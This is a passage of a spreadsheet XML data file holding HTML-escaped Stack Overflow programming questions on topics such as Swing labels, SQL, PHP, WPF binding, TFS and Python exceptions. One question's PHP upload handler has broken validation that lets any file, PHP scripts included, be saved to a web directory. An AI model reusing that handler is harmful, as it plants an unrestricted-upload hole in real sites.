&lt;p&gt;reference: &lt;a href="http://technet.microsoft.com/en-us/library/cc896556.aspx" rel="nofollow"&gt;http://technet.microsoft.com/en-us/library/cc896556.aspx&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;All the best&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How do I align textPosition for a label?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I wonder if it is possible to set &lt;code&gt;textPosition()&lt;/code&gt; for a &lt;code&gt;Label&lt;/code&gt; that includes an &lt;code&gt;Image&lt;/code&gt; and a text part so that the text is both TOP and LEFT. The problem I have now is that I need the text to be TOP but when that is selected the text is centered over the image. My wish is that the text is over the image but to the left and not centered. I wonder if there is a way to do this?&lt;/p&gt;
&lt;p&gt;I have tried to add the text to one &lt;code&gt;Label&lt;/code&gt; and the image to another &lt;code&gt;Label&lt;/code&gt; and then contain them in a container but the problem is then that the alignment will be the same for all the items(text over image) and item over item. So it will not be possible to see if the text over the second image is part of the first image or the second. &lt;/p&gt;
&lt;p&gt;Thanks.&lt;/p&gt;
&lt;hr&gt;
&lt;p&gt;Ok so this is what I mean. This is the current behaviour:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;Label item = new Label();
item.setIcon(icon);
item.setText("House:");
item.setTextPosition(TOP);
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Result:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;House:
 /\
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The wanted behaviour is:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;Label item = new Label();
item.setIcon(icon);
item.setText("House:");
item.setTextPosition(TOP);
item.setTextPosition(LEFT);
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;House:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;/\
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I need to set TextPosition to both Top and left, is that possible? Or is there any otherway I can get this behaviour. If I use a container the result will be:&lt;/p&gt;
&lt;p&gt;House:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;/\
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;House:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;/\
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;What I want is that the alignment between "House:" and /\ is separate from "House:" and the /\ above.&lt;/p&gt;
&lt;p&gt;I hope this makes any sense. Hard to explain it in a good way. Thanks for any help you can give me.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Use something else than JDBC over firewall</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;&lt;p&gt;
I have simple server-client application that uses JDBC to connect to database and things works ok. Application does few simple things with JDBC connection (get data, insert new line and few others). &lt;p&gt;
Now, I would like to keep the same application but use it outside of firewall - so, I would put something else on some host:port (and open that port to outside world) - instead of JDBC opening database access directly. &lt;p&gt;
I guess that this problem is faced many many times and sure there are a lot approches. 
&lt;br&gt;
One way can be doing servlet on one side, accessing it on client side. &lt;br&gt;
I guess, I haven't touched Spring yet, maybe another would be to do POJO Java Class and using Spring configure it as http service.
I have heard also "rumors" that Jetty has something that can help in this case (to minimaze coding on server and client side)
&lt;p&gt;
I would prefer something that:&lt;br&gt;
 - is not complicate (easy learning path)&lt;br&gt;
 - reuse something that is already done. 
&lt;p&gt;&lt;/p&gt;
&lt;p&gt;What approach would you recommend ? &lt;/p&gt;
&lt;p&gt;Thank you and regards,&lt;br&gt;
Igor&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Preferred way of #! in shell scripts</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I searched google but couldn't find an answer to this rather simple question. I have a python script that has the hash-bang (#!) on the first line:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;#!/usr/bin/python
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;However, what if this is run on a computer with python in /bin/python or /usr/local/bin/python, or some other place? There has to be a better way to set the interpreter for a shell script. It should be possible to set it via $PATH, as that will know where to find python if it's installed on the system.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>SQL query to select unreferenced rows</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm having a brain-dead moment... I have two tables described by:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;CREATE TABLE table_a (
    id             INTEGER          PRIMARY KEY AUTO_INCREMENT,
    name           VARCHAR(255)     NOT NULL
    UNIQUE (name))
CREATE TABLE table_b (
    id             INTEGER          PRIMARY KEY AUTO_INCREMENT,
    a_key          INTEGER          NOT NULL,
    other_stuff    VARCHAR(255)     NOT NULL,
    FOREIGN KEY(a_key)  REFERENCES table_a(id)
         ON DELETE CASCADE)
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;How can I select all rows from table_a that do not have an entry in table_b.a_key?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Getting the most out of Resharper - good tutorials/screencasts</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I've just installed Resharper, and I really don't know how to use it "correctly".
I noticed that there are some demos and documents at their website, but I'm wondering..&lt;/p&gt;
&lt;p&gt;..how did you learn to use it efficiently? Are there any other good resources(demos/tutorials)?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Silverlight: Getting image (from OpenFileDialog) width/height</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I've been using the BitmapImage.DownloadProgress event to wait until the image is loaded when creating a bitmap from a URI. That was I can use an event handler to check the Image.ActualWidth/ActualHeight after the download is complete. This works fine.&lt;/p&gt;
&lt;p&gt;But when I am loading an image that the user has selected from their computer, the DownloadProgress is useless.&lt;/p&gt;
&lt;p&gt;This works for URI bitmaps:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;private void LoadImage(Uri uri)
{
    this.ResetProgressImage();
    BitmapImage image = new BitmapImage();            
    image.DownloadProgress += new EventHandler&amp;lt;DownloadProgressEventArgs&amp;gt;(LoadImageDownloadProgress);
    image.UriSource = uri;
    this.ImageFull.Source = image;
}
private void LoadImageDownloadProgress(object sender, DownloadProgressEventArgs e)
{
    this.Dispatcher.BeginInvoke(delegate
    {
        this.ProgressImage.Value = e.Progress;
        if (e.Progress == 100)
        {
            ImageHelper.Current.Width = Math.Round(this.ImageFull.ActualWidth);
            ImageHelper.Current.Height = Math.Round(this.ImageFull.ActualHeight);
        }
    });
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;But this doesn't work when getting a BitmapImage from a stream:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;private void LoadImage(Stream stream)
{
    this.ResetProgressImage();
    BitmapImage image = new BitmapImage();            
    image.DownloadProgress += new EventHandler&amp;lt;DownloadProgressEventArgs&amp;gt;(LoadImageDownloadProgress);            
    image.SetSource(stream);
    this.ImageFull.Source = image;
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Does anyone know an alternative to DownloadProgress, when using SetSource(stream)?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to escape phpdoc comment in phpdoc comment?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I would like to know how to escape phpdoc comments within a phpdoc comment.&lt;/p&gt;
&lt;p&gt;For example, how would I have to write this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;/**
 * Some documentation...
 *
 * &amp;lt;code&amp;gt;
 * /**
 *  * Example example phpdoc.
 *  */
 * &amp;lt;/code&amp;gt;
 */
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Obviously above example won't work.&lt;/p&gt;
&lt;p&gt;I tried replacing the asterisk's with &amp;amp;#x2A;, but it will just nicely print "&amp;amp;#x2A;"...&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Places you can ask for quick code review?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Learning how to unit test in my own time though is providing me with further insight, I'd often would of liked to have someone there saying that I'm indeed going in the right direction with my tests.&lt;/p&gt;
&lt;p&gt;Doing this by myself (and being the only developer at my company actively looking into unit testing) I get no privilege nor do I have contacts that can do this for me. I was wondering if there are any sites out there that contain a community of developers that would be happy to help review how I'm approaching my unit testing, discuss with me what I could be doing better or how my approach could be improved / changed / complete revised from scratch.&lt;/p&gt;
&lt;p&gt;Such a site probably doesn't exist, and for a personal play project I'm not really willing to spend money on a code review (at what is currently not very much code at all) unless this really becomes a barrier to my progression.&lt;/p&gt;
&lt;p&gt;I just thought that perhaps I'd missed something out there in interdev world :P&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Problem with C# serialization extension methods</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I really like the extension method that TWith2Sugars posted &lt;a href="http://stackoverflow.com/questions/271398/post-your-extension-goodies-for-c-net-codeplexcomextensionoverflow#271423"&gt;here&lt;/a&gt;.  I ran into an odd problem though.  When I put this into a shared class library and call the serialization function, I get the following error:&lt;/p&gt;
&lt;blockquote&gt;
  &lt;p&gt;The type MyType was not expected. Use
  the XmlInclude or SoapInclude
  attribute to specify types that are
  not known statically.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;I looked around a bit and found that the XmlSerializer can only serialize types that it is aware of.  I interpret this to mean classes that are in the class library, not the project that I build based off that libary.&lt;/p&gt;
&lt;p&gt;Is there a way around this?  Can this function be placed into a class library or does it need to be in each project that uses it?&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Update:&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;I figured out what was causing the problem.  I had the following code:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;object o = new MyClass();
o.Serialize();
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;This was causing the error.  When I changed the code to:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;MyClass c = new MyClass();
c.Serialize();
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Everything ran fine.  So, lesson learned - don't try to (de)serialize generic objects.  The thing I liked the most about the link I referenced was that I did not have to put any XML attribute tags on my classes.  The extension method just worked.&lt;/p&gt;
&lt;p&gt;For purposes of closing out the question, I will award the answer to whoever expands on &lt;a href="http://stackoverflow.com/questions/515940/problem-with-c-serialization-extension-methods/515986#515986"&gt;Marc's answer&lt;/a&gt; (including Marc) with a code sample illustrating the use of [XmlInclude].&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Why does Visual Studio want to check-out a File when opened?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Why does Visual Studio want to check-out a File when opened?&lt;/p&gt;
&lt;p&gt;I just double click the file to open it and Visual Studio wants to check it out.
I did not make any changes to it. I just opened it. &lt;/p&gt;
&lt;p&gt;i.e. In Solution Explorer I double click ctlEmployeeEdit.vb and the first thing Visual Studio wants to do is check-out that file. I got VS set up to prompt me on check-out so I normally say no to the check-out and then the control will display.&lt;/p&gt;
&lt;p&gt;We are using Visual Studion 2005 and Visual Source Safe 2005.&lt;/p&gt;
&lt;p&gt;We have a solution of over a hundred files and it is only happening on a hand full of them but that hand full seems to be getting larger, almost a mouth full now. (Humm I wonder if a hand full is larger than a mouth full? But that question is for another posting.)&lt;/p&gt;
&lt;p&gt;Also how can this be fixed?&lt;/p&gt;
&lt;p&gt;Should I delete my local copy of the solution and do another "Get Latest" from Visual Source Safe when this happens?&lt;/p&gt;
&lt;p&gt;I have the feeling some of you are going to say the way to fix this is to upgrade to a &lt;strong&gt;REAL&lt;/strong&gt; Source Control producted. :)&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Edited:&lt;/strong&gt; &lt;/p&gt;
&lt;p&gt;Some of the Third Party controls are:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;DevExpress User Controls v8.3&lt;/li&gt;
&lt;li&gt;IdeaBlade DevForce control&lt;/li&gt;
&lt;/ol&gt;
</t>
  </si>
  <si>
    <t>extending jquery on the main element object</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I've seen some jquery code where people extend the main object like:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt; $('someId').myCustomObject();
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Is this possible or am I mistaken? (if yes, how?)&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Planning for efficiency early vs Premature optimization</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I seem to notice two schools of thought emerging in regards to optimization:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;&lt;strong&gt;Premature optimization is the root of all evil&lt;/strong&gt;.  You should only optimize when you've written the most readable and simplest thing possible.  If after profiling you determine that the software is too slow, you should optimize.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Optimizations should be done early in a project's lifecycle&lt;/strong&gt;.  Optimizations need to be planned for, but should be done reasonably.&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;On the face of things, they seem to be fairly opposed viewpoints.  The thing is, I see the merit in both schools of thought.  I can also think of times when both of these ways of thinking have helped me write better and faster software.&lt;/p&gt;
&lt;p&gt;Is there any way to reconcile these two ideas?  Is there a middle ground?  Is there a time when one idea is the best tool for the job?  Or am I presenting a false dichotomy and both views can co-exist peacefully?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Relative Paths Not Working in Xcode C++</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;There are numerous post over the net that detail how relative paths don't work in Xcode. I do have an Xcode template that I downloaded where the relative paths DO work, however I have not been able to figure out why nor replicate it in other projects.&lt;/p&gt;
&lt;p&gt;Firstly, I am using C++ in Xcode 3.1. I am not using Objective-C, nor any Cocoa/Carbon frameworks, just pure C++.&lt;/p&gt;
&lt;p&gt;Here is the code that works in my other Xcode template:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;sound-&amp;gt;LoadMusic( (std::string) "Resources/Audio/Pop.wav" );
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;This relative path works for me also in Windows. Running the following command gives me an absolute path to the application's full path:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;std::cout &amp;lt;&amp;lt; "Current directory is: " &amp;lt;&amp;lt; getcwd( buffer, 1000) &amp;lt;&amp;lt; "\n";
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;/Applications/myApp&lt;/p&gt;
&lt;p&gt;How can we get relative paths to work in an Xcode .app bundle?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How do I make Binding respect DependencyProperty value coercion?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a control with a DependencyProperty with a CoerceValueCallback.
This property is bound to a property on a model object.&lt;/p&gt;
&lt;p&gt;When setting the control property to a value that causes coercion the Binding pushes the &lt;strong&gt;uncoerced&lt;/strong&gt; value to the model object. The property value on the control is coerced correctly.&lt;/p&gt;
&lt;p&gt;How do I get the Binding to push the &lt;strong&gt;coerced&lt;/strong&gt; value to the model object?&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;void Initialize()
{
    UIObject ui = new UIObject();
    ModelObject m = new ModelObject();
    m.P = 4;
    Binding b = new Binding("P");
    b.Source = m;
    b.Mode = BindingMode.TwoWay;
    Debug.WriteLine("SetBinding");
    // setting the binding will push the model value to the UI
    ui.SetBinding(UIObject.PProperty, b);
    // Setting the UI value will result in coercion but only in the UI.
    // The value pushed to the model through the binding is not coerced.
    Debug.WriteLine("Set to -4");
    ui.P = -4;
    Debug.Assert(ui.P == 0);
    // The binding is TwoWay, the DP value is coerced to 0.
    Debug.Assert(m.P == 0); // Not true. This will be -4. Why???
}
class UIObject : FrameworkElement
{
    public static readonly DependencyProperty PProperty =
        DependencyProperty.Register("P", typeof(int), typeof(UIObject), 
        new FrameworkPropertyMetadata(
            new PropertyChangedCallback(OnPChanged), 
            new CoerceValueCallback(CoerceP)));
    public int P
    {
        get { return (int)GetValue(PProperty); }
        set { SetValue(PProperty, value); }
    }
    private static void OnPChanged(DependencyObject d, DependencyPropertyChangedEventArgs e)
    {
        Debug.WriteLine(typeof(UIObject) + ".P changed from " + e.OldValue + " to " + e.NewValue);
    }
    private static object CoerceP(DependencyObject sender, object value)
    {
        int p = (int)value;
        if (p &amp;lt; 0)
        {
            Debug.WriteLine(typeof(UIObject) + ".P coerced from " + p + " to 0");
            p = 0;
        }
        return p;
    }
}
class ModelObject
{
    private int p;
    public int P
    {
        get
        {
            Debug.WriteLine(this + ".P returned " + this.p);
            return this.p;
        }
        set
        {
            Debug.WriteLine(this + ".P changed from +" + this.p + " to " + value);
            this.p = value;
        }
    }
}
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>ASP.NET - AJAX - Partial followed by full postback problem</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I've a page that has a series of web controls. One of these is a textbox with AutoPostBack turned off.&lt;/p&gt;
&lt;p&gt;The way the page operates is that a button is clicked to save the form data. This button sits outside of the updatepanel.&lt;/p&gt;
&lt;p&gt;So when I hit the save button the partial postback happens for the dropdownlist and after this postback has completed a full postback fires for the save button. However when the full postback fires the form data is returned to the state before the save button was clicked - i.e. my changes are removed.&lt;/p&gt;
&lt;p&gt;I believe this could be to do with the viewstate being returned from the partial update and that viewstate not updating in the page before the full postback fires - or it getting corrupted.&lt;/p&gt;
&lt;p&gt;Does anyone have any ideas?&lt;/p&gt;
&lt;p&gt;Thanks.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Is there a "canonical" name for a function combining min() and max()?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I find that I frequently end up writing a function that I always call "&lt;code&gt;clamp()&lt;/code&gt;", that is kind of a combination of &lt;code&gt;min()&lt;/code&gt; and &lt;code&gt;max()&lt;/code&gt;.  Is there a standard, "canonical" name for this function?&lt;/p&gt;
&lt;p&gt;It always looks something like this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;function clamp($val, $lower, $upper)
{
  if ($val &amp;lt; $lower)
    return $lower;
  else if ($val &amp;gt; $upper)
    return $upper;
  else
    return $val;
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Or simply using built-in &lt;code&gt;min()&lt;/code&gt; and &lt;code&gt;max()&lt;/code&gt; functions:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;function clamp($val, $lower, $upper)
{
  return max($lower, min($upper, $val));
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Variations exist:  You can also check for invalid input, where &lt;code&gt;lower &amp;gt; upper&lt;/code&gt;, and either throw an exception or reverse the inputs.  Or you can ignore order of the inputs and call it a median-of-three function, but that can be confusing.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Best practice for running SQL Server reporting services. Should I run on the database or web server?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am configuring a new environment to run several intranet web applications.  I have 2 servers, one will be the SQL Server 2008 server, and the other will be the IIS server.  I also need to install SQL Server Reporting Services.  I am not sure whether it would be better to run reporting services on the database server, or web server.  Is there a best practice for this situation?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to delete object(s) from project when using deploy method?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;When you delete an obsolete object from a project/solution, what's the best way to transfer this change into production? Does deploying have an option for this?&lt;/p&gt;
&lt;p&gt;EDIT: This is a database project in Visual Studio 2008, deploying to SQL Server 2005.&lt;/p&gt;
&lt;p&gt;Thanks&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Spring - binding to an object rather than a String or primitive</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Let's say I have the following command object:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;class BreakfastSelectCommand{
	List&amp;lt;Breakfast&amp;gt; possibleBreakfasts;
	Breakfast selectedBreakfast;
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;How can I have spring populate "selectedBreakfast" with a breakfast from the list?&lt;/p&gt;
&lt;p&gt;I was figuring I'd do something like this in my jsp:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;form:radiobuttons items="${possibleBreakfasts}" path="selectedBreakfast"  /&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;But this doesn't seem to work. Any ideas?&lt;/p&gt;
&lt;p&gt;thanks,&lt;/p&gt;
&lt;p&gt;-Morgan&lt;/p&gt;
</t>
  </si>
  <si>
    <t>What does the Visual Studio "Any CPU" target mean?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have some confusion related to the .NET platform build options in Visual Studio 2008.&lt;/p&gt;
&lt;p&gt;What is the "Any CPU" compilation target, and what sort of files does it generate? I examined the output executable of this "Any CPU" build and found that they are the x86 executables (who would not see that coming!). So, is there any the difference between targeting executable to x86 vs "Any CPU"?&lt;/p&gt;
&lt;p&gt;Another thing that I noticed, is that managed C++ projects do not have this platform as an option. Why is that? Does that mean that my suspicion about "Any CPU" executables being plain 32-bit ones is right?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>What is the difference between shelve and check in in TFS?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;What is the concept of each?&lt;/p&gt;
&lt;p&gt;When is it ok to shelve your changes instead of checking in?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>PHP File Validation using If statements uploads</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Hi I am quite new to php but i have been following some tutorials but they don't seem to work so I have tried to adapt them. 
 I have tested this code and it works to a point but theres something else I can't get my head around, the php file is not uploading (fine) but the details are still being writen to the datbase although the $ok is spose to be set to 0 (not fine). It might be easier if explain what is ment to happen here: &lt;/p&gt;
&lt;p&gt;-The User can upload gif or jpeg files. Details added to the db.
-The User can upload no file as a default will be used. Details added to the db.
-The User &lt;strong&gt;should not&lt;/strong&gt; be able to upload any other file. No record should be on the db, user should have to try again. &lt;/p&gt;
&lt;p&gt;My Code so far: &lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;?php
//This is the directory where images will be saved
$target = "images/";
$target = $target . basename( $_FILES['photo']['name']);
$ok=0; 
//This gets all the other information from the form
$name= mysql_real_escape_string ($_POST['nameMember']);
$bandMember= mysql_real_escape_string ($_POST['bandMember']);
$pic= mysql_real_escape_string ($_FILES['photo']['name']);
$about= mysql_real_escape_string ($_POST['aboutMember']);
$bands= mysql_real_escape_string ($_POST['otherBands']);
$uploaded_size=$_FILES['photo']['file_size']; 
if ($uploaded_size &amp;gt; 350000)
{
echo "Your file is too large, 35Kb is the largest file you can upload.&amp;lt;br&amp;gt;";
$ok=0;
} 
if ($uploaded_type =="text/php")
{
echo "No PHP files&amp;lt;br&amp;gt;";
$ok=0;
} 
if (!($uploaded_type =="image/jpeg"))
{
echo "JPEG&amp;lt;br&amp;gt;";$ok=1;
} 
if ($uploaded_type =="image/gif")
{
echo "GIf&amp;lt;br&amp;gt;";$ok=1;
} 
if (empty($pic)){
echo "You haven't uploaded a photo, a default will be used instead.&amp;lt;br/&amp;gt;";$ok=1;}
if ($ok==0)
{
Echo "Sorry your file was not uploaded, please try again with the correct format.";
}
//If everything is ok we try to upload it
else
{ 
// Connects to your Database
mysql_connect("localhost", "*******", "******") or die(mysql_error()) ;
mysql_select_db("project") or die(mysql_error()) ;
//Writes the information to the database
mysql_query("INSERT INTO dbProfile (nameMember,bandMember,photo,aboutMember,otherBands)
VALUES ('$name', '$bandMember', '$pic', '$about', '$bands')") ;
//Writes the photo to the server
if(move_uploaded_file($_FILES['photo']['tmp_name'], $target))
{
//Tells you if its all ok
echo "The file ". basename( $_FILES['uploadedfile']['name']). " has been uploaded, and your information has been added to the directory&amp;lt;br/&amp;gt;";
print "&amp;lt;a class=\"blue\" href=\"createMember.php\"&amp;gt;Add Another Record&amp;lt;/a&amp;gt; | &amp;lt;a class=\"blue\" href=\"listMember.php\"&amp;gt;Band Member Profiles and Affiliates Menu&amp;lt;/a&amp;gt;";
}
else {
//Gives and error if its not
echo "&amp;lt;p&amp;gt;If you have uploaded a picture there may have been a problem uploading your file.&amp;lt;/p&amp;gt;";
print "&amp;lt;a class=\"blue\" href=\"createMember.php\"&amp;gt;Add Another Record&amp;lt;/a&amp;gt; | &amp;lt;a class=\"blue\" href=\"listMember.php\"&amp;gt;Band Member Profiles and Affiliates Menu&amp;lt;/a&amp;gt;";
}
}
?&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Cheers in advance. CHL&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How do I get a reference to the underlying object in a bound DataGridViewComboBoxCell?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I don't know if my mind is not working today or if this is actually harder than I think it should be.&lt;/p&gt;
&lt;p&gt;I've got a DataGridView with a DataGridViewComboBoxColumn bound to a generic IList of CustomObjects.  Here's a rough code sample of how I setup the column.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;DataGridViewComboBoxColumn location = new DataGridViewComboBoxColumn() 
{
    Name = "Location",
    DataSource = new BindingSource(GetMyLocations(), null),
    DisplayMember = "Name",
    ValueMember = "ID"
};
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Then when I want to return the value of a cell:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;string id = (string)row.Cells["Location"].Value;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;But I don't want a reference to the ID property, I want a reference to the actual Location object!  I've tried not specifying a ValueMember but that appears to just use the DisplayMember.&lt;/p&gt;
&lt;p&gt;I could iterate through all of the Location objects in the column DataSource and check for the matching ID property, however, it seems like the ComboBoxCell ought to be able to return that directly.&lt;/p&gt;
&lt;p&gt;Also, I can't use a Dictionary in this case.&lt;/p&gt;
&lt;p&gt;Any ideas as to the best way to accomplish that?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Java: Image as toggle button</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;How can I create in a Swing interface a toggle image button?
I have two images, imageon.jpg and imageoff.jpg,and I basically want a clickable element that toggles the images and fires an event.&lt;/p&gt;
&lt;p&gt;Update: Is there a way to override the usual 'chrome' around the image? I would prefer a simple image to a button with an image inside.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>MySql Union not getting executed in a view</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am trying to create a view for a UNION of 2 select statements that I have created.&lt;/p&gt;
&lt;p&gt;The UNION is working fine when executed individually &lt;/p&gt;
&lt;p&gt;But the problem is only the 1st part of the UNION is getting executed when I am executing it as a view.&lt;/p&gt;
&lt;p&gt;The query I am using is as below&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;SELECT DISTINCT products.pid AS id, 
                products.pname AS name, 
                products.p_desc AS description,
                products.p_loc AS location,
                products.p_uid AS userid,
                products.isaproduct AS whatisit 
           FROM products
          UNION
          SELECT DISTINCT services.s_id AS id, 
                services.s_name AS name, 
                services.s_desc AS description,
                services.s_uid AS userid,
                services.s_location AS location,
                services.isaservice AS whatisit 
           FROM services
          WHERE services.s_name
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The above works fine when i execute it separately.
But when I use it as a view, it does not give me the results of the services part.&lt;/p&gt;
&lt;p&gt;Could someone please help me with this?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Can multiple CPUs simultaneously write to the same RAM location?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Are machine word size (or smaller) writes serialized? Only one native opcode is needed to copy register content to RAM. &lt;/p&gt;
</t>
  </si>
  <si>
    <t>Show changesets since last "get latest version"?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Using Team Foundation Server and Visual Studio 2008, is there a way to highlight the submissions since my last "get latest version"?  This would allow me to quickly identify what has been submitted since my last "pull" without having to remember which changeset I last synced with.&lt;/p&gt;
&lt;p&gt;Thanks.&lt;/p&gt;
&lt;p&gt;Eric&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to print every element of an ARRAY in PL/SQL?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;This is a pretty basic question, but here goes:&lt;/p&gt;
&lt;p&gt;I have an array of VARCHAR2 strings in PL/SQL.&lt;/p&gt;
&lt;p&gt;How can I print every element in that array?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Find the classname of a UI control</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I need a tool which tells the classname of the UI control on which my mouse pointer is. My GUI is in Swing. Does such a tool exist? &lt;/p&gt;
</t>
  </si>
  <si>
    <t>return eats exception</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I found the following behavior at least &lt;em&gt;weird&lt;/em&gt;:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;def errors():
    try:
        ErrorErrorError
    finally:
        return 10
print errors()
# prints: 10
# It should raise: NameError: name 'ErrorErrorError' is not defined
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The exception disappears when you use &lt;code&gt;return&lt;/code&gt; inside a &lt;code&gt;finally&lt;/code&gt; clause. Is that a bug? Is that documented anywhere?&lt;/p&gt;
&lt;p&gt;But the real question (and the answer I will mark as correct) is:&lt;br&gt;
What is the python developers' reason to allow that odd behavior?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Why volatile is not enough?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm confused. Answers to my &lt;a href="http://stackoverflow.com/questions/516940/can-multiple-cpus-simultaneously-write-to-the-same-ram-location"&gt;previous question&lt;/a&gt; seems to confirm my assumptions. But as stated &lt;a href="http://stackoverflow.com/questions/154551/volatile-vs-interlocked-vs-lock"&gt;here&lt;/a&gt; volatile is not enough to assure atomicity in .Net. Either operations like incrementation and assignment in MSIL are not translated directly to single, native OPCODE or many CPUs can simultaneously read and write to the same RAM location.&lt;/p&gt;
&lt;p&gt;To clarify:&lt;/p&gt;
&lt;ol&gt;
